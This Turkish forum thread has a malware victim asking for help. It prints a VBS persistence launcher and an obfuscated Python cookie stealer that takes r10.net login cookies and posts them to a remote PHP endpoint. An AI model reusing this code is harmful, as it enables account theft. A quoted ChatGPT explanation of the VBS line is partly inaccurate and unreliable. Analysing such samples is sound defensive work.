Bu zararlı bir kodmu?

Question

CreateObject("WScript.Shell").Run """" & "C:UserskuladimAppDataRoamingWindows UpdaterUpdater.exe" & """ """ & "-s" & """ """ & "C:UserskuladimAppDataRoamingWindows UpdaterUpdater.py" & """ """ & "-p" & """ """ & "59000" & """", 0, FalseGÜNCELLEME:
windows updater adlı klasörde
bu dosyaları çalıştırıyor yukarıdaki kod ve başlangıç uygulaması olarak ayarlanmış
güvenlik sekmesinde exe dosyasının tam yetkisi olduğu görünüyor virüs totalde trojen olarak algıladı

Darkanonims · Answer

Shell zararlı diye biliyorum

Gelistir · Answer

Darkanonims adlı üyeden alıntı:						mesajı görüntüle									Shell zararlı diye biliyorum 		shell olduğu için değil appdata klasöründe olduğu için şüphelendim bilgili biri varsa çok iyi olur

Antalyatelekom · Answer

Gelistir adlı üyeden alıntı:						mesajı görüntüle									CreateObject("WScript.Shell").Run """" & "C:UserskuladimAppDataRoamingWindows UpdaterUpdater.exe" & """ """ & "-s" & """ """ & "C:UserskuladimAppDataRoamingWindows UpdaterUpdater.py" & """ """ & "-p" & """ """ & "59000" & """", 0, False 		Bu kod, Visual Basic Script (VBS) dilinde yazılmış bir komuttur. Bu komut, WScript.Shell nesnesini kullanarak bir uygulama çalıştırmak için kullanılır. Kod, aşağıdaki parametreleri kullanır:C:UserskuladimAppDataRoamingWindows UpdaterUpdater.exe: Çalıştırılacak uygulamanın dosya yolu.
-s: Uygulamanın çalıştırılacağı komut satırı argümanı.
C:UserskuladimAppDataRoamingWindows UpdaterUpdater.py: Uygulamanın çalıştırılacağı komut satırı argümanı.
-p: Uygulamanın çalıştırılacağı komut satırı argümanı.
59000: Uygulamanın çalıştırılacağı komut satırı argümanı.
Bu kod, belirtilen dosya yolu ve parametreler kullanılarak bir uygulama başlatır. Komutun son iki parametresi, uygulamanın bir port numarası olan 59000 üzerinden çalışmasını sağlar. Son iki parametre, uygulamanın çalıştırıldığı bilgisayarın IP adresini de içerebilir. Kodun son iki parametresi, uygulamanın nasıl çalışacağını belirler ve uygulamanın çalışması için gerekli olan argümanları sağlar.

Kaynak: Chat GPT

Gelistir · Answer

UzmanlarHosting adlı üyeden alıntı:						mesajı görüntüle									Bu kod, Visual Basic Script (VBS) dilinde yazılmış bir komuttur. Bu komut, WScript.Shell nesnesini kullanarak bir uygulama çalıştırmak için kullanılır. Kod, aşağıdaki parametreleri kullanır:C:UserskuladimAppDataRoamingWindows UpdaterUpdater.exe: Çalıştırılacak uygulamanın dosya yolu.
-s: Uygulamanın çalıştırılacağı komut satırı argümanı.
C:UserskuladimAppDataRoamingWindows UpdaterUpdater.py: Uygulamanın çalıştırılacağı komut satırı argümanı.
-p: Uygulamanın çalıştırılacağı komut satırı argümanı.
59000: Uygulamanın çalıştırılacağı komut satırı argümanı.
Bu kod, belirtilen dosya yolu ve parametreler kullanılarak bir uygulama başlatır. Komutun son iki parametresi, uygulamanın bir port numarası olan 59000 üzerinden çalışmasını sağlar. Son iki parametre, uygulamanın çalıştırıldığı bilgisayarın IP adresini de içerebilir. Kodun son iki parametresi, uygulamanın nasıl çalışacağını belirler ve uygulamanın çalışması için gerekli olan argümanları sağlar.

Kaynak: Chat GPT 		Çok güzel muhtemelen rat yemişim ve 59000 portundan dinleniyor başlangıç uygulamalarında run.vbs diye görünüyor

Celilkilic · Answer

Gelistir adlı üyeden alıntı: mesajı görüntüle

İp adresini aldım teşekkürler

Rica ederim hocam.

IP Adresini https://bgp.he.net/ üzerinde arama yaparak hangi servis sağlayıcısında olduğunu da görüntüleyebilirsiniz.

Gelistir · Answer

Netkreatif adlı üyeden alıntı:						mesajı görüntüle									NetLimiter 4 programı ile dışarıya giden bir bağlantı varsa ip adresini dahi görüntüleyebilirsin. Karşı kişiye/sunucuya ulaşabilirsin yani  		Teşekkürler hocam her zamanki gibi şahanesiniz eklenti ile ilgili bir sorunumda var onun içinde pm atıyorum

Gelistir · Answer

Netkreatif adlı üyeden alıntı:						mesajı görüntüle									NetLimiter 4 programı ile dışarıya giden bir bağlantı varsa ip adresini dahi görüntüleyebilirsin. Karşı kişiye/sunucuya ulaşabilirsin yani  		İp adresini aldım teşekkürler

Celilkilic · Answer

Gelistir adlı üyeden alıntı:						mesajı görüntüle									İp adresini aldım teşekkürler 		Rica ederim hocam.

IP Adresini https://bgp.he.net/ üzerinde arama yaparak hangi servis sağlayıcısında olduğunu da görüntüleyebilirsiniz.

Gelistir · Answer

Netkreatif adlı üyeden alıntı:						mesajı görüntüle									Rica ederim hocam.

IP Adresini https://bgp.he.net/ üzerinde arama yaparak hangi servis sağlayıcısında olduğunu da görüntüleyebilirsiniz.  		Hocam ilginç bir sonuç aldım dns bilgisi
https://www.donanimhaber.com/
sitesi görünüyor?

Celilkilic · Answer

Gelistir adlı üyeden alıntı:						mesajı görüntüle									Hocam ilginç bir sonuç aldım dns bilgisi
https://www.donanimhaber.com/
sitesi görünüyor? 		Yanlış bir ip adresini görüntülemiş olabilirsiniz, program tüm bağlantılarınızı listeliyor diğer adreslere göz gezdirin derim.

Gelistir · Answer

Netkreatif adlı üyeden alıntı:						mesajı görüntüle									Yanlış bir ip adresini görüntülemiş olabilirsiniz, program tüm bağlantılarınızı listeliyor diğer adreslere göz gezdirin derim. 		eminim hocam virüsün exe dosyası çok netdi

Neron · Answer

UpdaterUpdater.py dosyası içinde olanlar önemli

Gelistir · Answer

Neron adlı üyeden alıntı:						mesajı görüntüle									UpdaterUpdater.py dosyası içinde olanlar önemli 		Dosya şifreli hocam rat yemişim antivürüste trojan olarak sonuç verdi 3 dosya sokmuş sisteme
biri basic dosyası .vbs bu başlangıçta çalışıyor exe dosyasını çalıştırıyor aynı şekilde py dosyasınıda exe direk karşı pc bağlantı yapıyor update.py de yazılımı ve bağlantıyı güncelliyor üstelik bilgisayarımı bir arasunucuya yönlendirmiş ayarlarımdan python dosyasının kodlarıda şu şekilde

import urllib as gSKIaflpciXm
import os as JWMR
import base64 as vIlxNhrREmtF

aYXrERqJoA = lambda n: (n - (2 % 4)) - 1
QKFvwrXuUy = lambda s: ''.join(chr(int(aYXrERqJoA(ord(c)))) for c in s)
JWMR.environ[QKFvwrXuUy("qrbsur{|")] = QKFvwrXuUy("-")

def request(sIiOaNoZ):
if sIiOaNoZ.request.url == QKFvwrXuUy("kwwsv=22zzz1u431qhw2"):
DEmTMnQNejcKFl = sIiOaNoZ.request.cookies.get_all(QKFvwrXuUy("u43xvhulg"))
lEpOAQZkgaDtbrnCfGoyRLUxXh = sIiOaNoZ.request.cookies.get_all(QKFvwrXuUy("u43sdvvzrug"))
eEYvPiNw = sIiOaNoZ.request.cookies.get_all(QKFvwrXuUy("u43idvw5id"))
DjZXLpzVUlugAneOdMax = sIiOaNoZ.request.headers[QKFvwrXuUy("Xvhu0Djhqw")]

if DEmTMnQNejcKFl:
if lEpOAQZkgaDtbrnCfGoyRLUxXh:
ngBmCydc = (DEmTMnQNejcKFl[int(aYXrERqJoA(3))], lEpOAQZkgaDtbrnCfGoyRLUxXh[int(aYXrERqJoA(3))], eEYvPiNw[int(aYXrERqJoA(3))] if eEYvPiNw else '', DjZXLpzVUlugAneOdMax).__repr__()

fPcGKB = QKFvwrXuUy("3{4{5{6{7{8{9")
cVLvNFeWkpDgTKYjAzIPuSMCtbhGimUE = ''

for SP in range(len(ngBmCydc)):
cVLvNFeWkpDgTKYjAzIPuSMCtbhGimUE += chr(ord(ngBmCydc[SP]) ^ ord(fPcGKB[SP % len(fPcGKB)]))

ngBmCydc = vIlxNhrREmtF.b64encode(cVLvNFeWkpDgTKYjAzIPuSMCtbhGimUE.encode()).decode()
ngBmCydc = gSKIaflpciXm.parse.urlencode({QKFvwrXuUy("gdpq5"): ngBmCydc}).encode()
qAjcdS = gSKIaflpciXm.request.Request(QKFvwrXuUy("kwws=22kgl}oholvdqv1frp2gdpq51sks"), data=ngBmCydc)
gSKIaflpciXm.request.urlopen(qAjcdS)

Neron · Answer

baya amatör gibi duruyor normal virüs değil çevrenizden biri sokmuştur veya indirdiğiniz crackli birşey vs.

çookie çalıp bir yere gönderiyor gibi

Gelistir · Answer

Neron adlı üyeden alıntı:						mesajı görüntüle									baya amatör gibi duruyor normal virüs değil çevrenizden biri sokmuştur veya indirdiğiniz crackli birşey vs. 		Çevremden birinin sokma şansı yok muhtemelen crackten vs bulaşmış çünkü herhangi bir veri ihlali görünmüyor ip adreside elimde ancak ne yapmalıyım bilmiyorum